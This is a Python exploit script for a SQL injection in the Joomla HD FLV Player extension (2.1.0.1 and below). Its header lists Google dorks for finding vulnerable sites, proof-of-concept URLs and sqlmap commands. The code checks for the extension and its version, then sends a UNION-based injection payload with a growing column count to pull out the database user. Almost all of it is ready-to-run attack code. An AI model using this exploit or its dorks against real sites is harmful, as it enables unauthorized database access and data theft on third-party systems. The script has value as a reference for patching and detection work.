#!/usr/bin/python # # Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.hdflvplayer.net/ # # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5 # # Dork google 1: inurl:/component/hdflvplayer/ # Dork google 2: inurl:com_hdflvplayer # # Date : 2014-11-11 # # Tested on : BackBox 3.x/4.x # # Info: The variable "id" is not sanitized (again) # Over 80.000 downloads (statistic reported on official site) # # # Video Demo: http://youtu.be/-EdOQSjAhW8 # # Poc: # http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli] # http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite) # # Poc sqlmap: # sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql # sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite) # # http connection import urllib, urllib2 # string manipulation import re # Errors management import sys # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url banner = """ _______ __ ___ ___ ______ | _ .-----.-----.--------| .---.-. | Y | _ \ |___| | _ | _ | | | _ | |. 1 |. | \ |. | |_____|_____|__|__|__|__|___._| |. _ |. | \ |: 1 | |: | |: 1 / |::.. . | |::.|:. |::.. . / `-------' `--- ---`------' _______ ___ ___ ___ _______ __ | _ | | | Y | | _ | .---.-.--.--.-----.----. |. 1___|. | |. | | |. 1 | | _ | | | -__| _| |. __) |. |___|. | | |. ____|__|___._|___ |_____|__| |: | |: 1 |: 1 | |: | |_____| |::.| |::.. . |\:.. ./ |::.| `---' `-------' `---' `---' <= 2.1.0.1 Sql Injection Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) checkext = 0 evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' } char = "%2CNULL" endurl = "%2CNULL%23" bar = "#" print(banner) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} sys.stdout.write("\r[+] Searching HD FLV Extension...: ") try: req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers) response = urllib2.urlopen(req).readlines() for line_version in response: if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1: checkext += 1 else: checkext += 0 if checkext > 0: sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND") else: sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n") sys.exit(1) except urllib2.HTTPError: sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n") sys.exit(1) except urllib2.URLError as e: print("\n[X] Connection Error: "+str(e.code)) sys.exit(1) print("") sys.stdout.write("\r[+] Checking Version: ") try: req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers) response = urllib2.urlopen(req).readlines() for line_version in response: if not line_version.find("<version>") == -1: VER = re.compile('>(.*?)<').search(line_version).group(1) sys.stdout.write("\r[+] Checking Version: "+str(VER)) except urllib2.HTTPError: sys.stdout.write("\r[+] Checking Version: Unknown") except urllib2.URLError as e: print("\n[X] Connection Error: "+str(e.code)) sys.exit(1) print("") for exploiting, dork in evilurl.iteritems(): s = "" barcount = "" for a in range(1,100): s += char try: req = urllib2.Request(host+exploiting+s+endurl, None, headers) response = urllib2.urlopen(req).read() if "h0m3l4b1t" in response: print "\n[!] VULNERABLE" current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1) print "[*] Username: "+str(current_user) print "" print "[*] 3v1l Url: "+host+exploiting+s+endurl sys.exit(0) except urllib2.HTTPError as e: response = e.read() if "h0m3l4b1t" in response: print "\n[!] VULNERABLE" current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1) print "[*] Username: "+str(current_user) print "" print "[*] 3v1l Url: "+host+exploiting+s+endurl sys.exit(0) except urllib2.URLError as e: print("\n[X] Connection Error: "+str(e.code)) sys.exit(1) barcount += bar sys.stdout.write("\r[+] Exploiting...please wait: "+barcount) sys.stdout.flush() print "\n[X] Not vulnerable :(" print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"